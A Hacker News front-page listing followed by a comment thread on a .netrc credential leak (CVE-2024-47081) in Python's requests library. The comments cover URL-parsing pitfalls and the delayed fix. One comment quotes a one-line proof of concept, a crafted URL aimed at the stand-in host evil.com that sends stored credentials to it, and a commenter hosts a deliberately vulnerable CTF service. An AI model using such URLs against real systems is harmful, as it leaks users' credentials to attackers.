frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

Start all of your commands with a comma

https://rhodesmill.org/brandon/2009/commands-with-comma/
142•theblazehen•2d ago•42 comments

OpenCiv3: Open-source, cross-platform reimagining of Civilization III

https://openciv3.org/
668•klaussilveira•14h ago•202 comments

The Waymo World Model

https://waymo.com/blog/2026/02/the-waymo-world-model-a-new-frontier-for-autonomous-driving-simula...
949•xnx•19h ago•551 comments

How we made geo joins 400× faster with H3 indexes

https://floedb.ai/blog/how-we-made-geo-joins-400-faster-with-h3-indexes
122•matheusalmeida•2d ago•32 comments

Unseen Footage of Atari Battlezone Arcade Cabinet Production

https://arcadeblogger.com/2026/02/02/unseen-footage-of-atari-battlezone-cabinet-production/
53•videotopia•4d ago•2 comments

Show HN: Look Ma, No Linux: Shell, App Installer, Vi, Cc on ESP32-S3 / BreezyBox

https://github.com/valdanylchuk/breezydemo
229•isitcontent•14h ago•25 comments

Jeffrey Snover: "Welcome to the Room"

https://www.jsnover.com/blog/2026/02/01/welcome-to-the-room/
16•kaonwarb•3d ago•19 comments

Monty: A minimal, secure Python interpreter written in Rust for use by AI

https://github.com/pydantic/monty
222•dmpetrov•14h ago•117 comments

Vocal Guide – belt sing without killing yourself

https://jesperordrup.github.io/vocal-guide/
27•jesperordrup•4h ago•16 comments

Show HN: I spent 4 years building a UI design tool with only the features I use

https://vecti.com
330•vecti•16h ago•143 comments

Hackers (1995) Animated Experience

https://hackers-1995.vercel.app/
494•todsacerdoti•22h ago•243 comments

Sheldon Brown's Bicycle Technical Info

https://www.sheldonbrown.com/
381•ostacke•20h ago•95 comments

Microsoft open-sources LiteBox, a security-focused library OS

https://github.com/microsoft/litebox
359•aktau•20h ago•181 comments

Show HN: If you lose your memory, how to regain access to your computer?

https://eljojo.github.io/rememory/
288•eljojo•17h ago•169 comments

An Update on Heroku

https://www.heroku.com/blog/an-update-on-heroku/
412•lstoll•20h ago•278 comments

Was Benoit Mandelbrot a hedgehog or a fox?

https://arxiv.org/abs/2602.01122
19•bikenaga•3d ago•4 comments

PC Floppy Copy Protection: Vault Prolok

https://martypc.blogspot.com/2024/09/pc-floppy-copy-protection-vault-prolok.html
63•kmm•5d ago•6 comments

Dark Alley Mathematics

https://blog.szczepan.org/blog/three-points/
90•quibono•4d ago•21 comments

How to effectively write quality code with AI

https://heidenstedt.org/posts/2026/how-to-effectively-write-quality-code-with-ai/
256•i5heu•17h ago•196 comments

Delimited Continuations vs. Lwt for Threads

https://mirageos.org/blog/delimcc-vs-lwt
32•romes•4d ago•3 comments

What Is Ruliology?

https://writings.stephenwolfram.com/2026/01/what-is-ruliology/
43•helloplanets•4d ago•42 comments

Where did all the starships go?

https://www.datawrapper.de/blog/science-fiction-decline
12•speckx•3d ago•4 comments

Introducing the Developer Knowledge API and MCP Server

https://developers.googleblog.com/introducing-the-developer-knowledge-api-and-mcp-server/
59•gfortaine•12h ago•25 comments

Female Asian Elephant Calf Born at the Smithsonian National Zoo

https://www.si.edu/newsdesk/releases/female-asian-elephant-calf-born-smithsonians-national-zoo-an...
33•gmays•9h ago•12 comments

I now assume that all ads on Apple news are scams

https://kirkville.com/i-now-assume-that-all-ads-on-apple-news-are-scams/
1066•cdrnsf•23h ago•446 comments

I spent 5 years in DevOps – Solutions engineering gave me what I was missing

https://infisical.com/blog/devops-to-solutions-engineering
150•vmatsiiako•19h ago•67 comments

Why I Joined OpenAI

https://www.brendangregg.com/blog/2026-02-07/why-i-joined-openai.html
149•SerCe•10h ago•138 comments

Understanding Neural Network, Visually

https://visualrambling.space/neural-network/
287•surprisetalk•3d ago•43 comments

Learning from context is harder than we thought

https://hy.tencent.com/research/100025?langVersion=en
182•limoce•3d ago•98 comments

Show HN: R3forth, a ColorForth-inspired language with a tiny VM

https://github.com/phreda4/r3
73•phreda4•13h ago•14 comments
Open in hackernews

CVE-2024-47081: Netrc credential leak in PSF requests library

https://seclists.org/fulldisclosure/2025/Jun/2
62•jupenur•8mo ago

Comments

dcrazy•8mo ago
> The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.
pixl97•8mo ago
Execute the call

>requests.get('http://example.com:@evil.com/')

>Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call

Instead of having a url parse error it appears to drop the : and use the password:domain format.

woodruffw•8mo ago
Another good example of lax URL parsing/parser differentials being problematic.

That being said, I wonder how big the actual impact here is in practice: how many users actually use .netrc? I’ve been using curl and other network tools for well over a decade and I don’t think I’ve ever used .netrc for site credentials.

w7•8mo ago
I think it may be in use by tools without people being aware. I decided to check my workstation for it just in case, figuring the file would be empty, or not exist.

Instead it seems to be populated with what seem to be Heroku API and git credentials.

cozzyd•8mo ago
I have it on my laptop because it's the most convenient way to download datasets from various repositories (e.g. NASA Earth Data).
edelbitter•8mo ago
Well then go check if you are for some reason using any of the other surprise features [1], like honoring the CURL_CA_BUNDLE env variable, or not honoring the PROXIES env variable if REQUEST_METHOD is set.

1: https://requests.readthedocs.io/en/latest/api/#requests.Sess...

awoimbee•8mo ago
That's some horrible url parsing code...

But honestly urllib sucks:

url.hostname doesn't return the port url.netloc also returns the basic auth part So you have to f"{u.hostname}:{u.port}"

edelbitter•8mo ago
Wait till you see the cPython stdlib email parser..

Any programming language these days should ship a decent rfc5234 API in the standard library, so you do not get these kinds of problems in slightly different fashion for each and every library/program.

janzer•8mo ago
Given that the actual vulnerability seems relatively niche along with it being such a popular library officially maintained by the Python foundation, the scariest line in the advisory is almost certainly:

The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.

Daviey•8mo ago
Well, it's probably just a coincidence, but I literally just spun up a web service that is vulnerable to this: https://isitup.daviey.com/

The code doesn't make any reference to a .netrc, but I happen to have one in ~/.netrc:

  machine localhost
  login *REDACTED*
  password CTF{*REDACTED*}
It's not ideal that requests automatically slurps credentials from ~/.netrc and leaks them, even when my code never references it. It's possible that the netrc is on the same server from a different application, developer debugging environment, or just forgotten about etc.

First one to grab the flag wins, well, nothing. But have fun. I'll keep it online for a couple of weeks, or until the VC money runs out.

dgl•8mo ago

  Sorry, you have been blocked
  You are unable to access daviey.com
Looks like Cloudflare has decided the whole thing is dodgy. Or doesn't like my IP address...
Daviey•8mo ago
That's really strange... because it seems to be working for some people (already have the first solve). I can't see an issues in CF...

EDIT: I had the security in CF too robust, try now?

progbits•8mo ago
Edit: Comment removed on request of parent.
Daviey•8mo ago
Well done for solving it.. but I'd have preferred you had not shared the solution, it's against the spirit of these sorts of things, but I can't stop you. :)

EDIT: I do appreciate you removing the solution. Have a great day.

audiodude•8mo ago
If you, like me, have never heard of a .netrc file...

https://everything.curl.dev/usingcurl/netrc.html

neilv•8mo ago
There might be a funny thing with FTP, in which, if a company is using FTP, it's probably for something important.

(Even if it's a bad idea now, and compromise of it could result in a bad quarter or regulatory action, legacy systems and priorities happen.)

zx8080•8mo ago
A funny commit message in the root cause (as stated in the linked post) commit:

> Push code review advice from @sigmavirus24

dfedbeef•8mo ago
I feel this
sionisrecur•8mo ago
To be fair, the advice from sigmavirus24 was about dealing with decoding the ':' character: https://github.com/psf/requests/pull/2936/files

The code already had `host = ri.netloc.split(':')[0]` before that.

The actual root issue is urlparse doesn't split the host, user, pass and port and trying to do it manually is very error prone:

    urllib.parse.urlparse('http://example.com:@evil.com:8080/')
    ParseResult(scheme='http', netloc='example.com:@evil.com:8080', path='/', params='', query='', fragment='')
Compare this with php:

    parse_url ('http://example.com:@evil.com:8080/')
    [
        "scheme" => "http",
        "host" => "evil.com",
        "port" => 8080,
        "user" => "example.com",
        "pass" => "",
        "path" => "/",
    ]
kidmin•8mo ago
and it is from the beginning: https://github.com/psf/requests/commit/79bb9ee1417afe2231972...
Daviey•8mo ago
Patch has now been merged, seems the Full Disclosure process works, https://github.com/psf/requests/pull/6965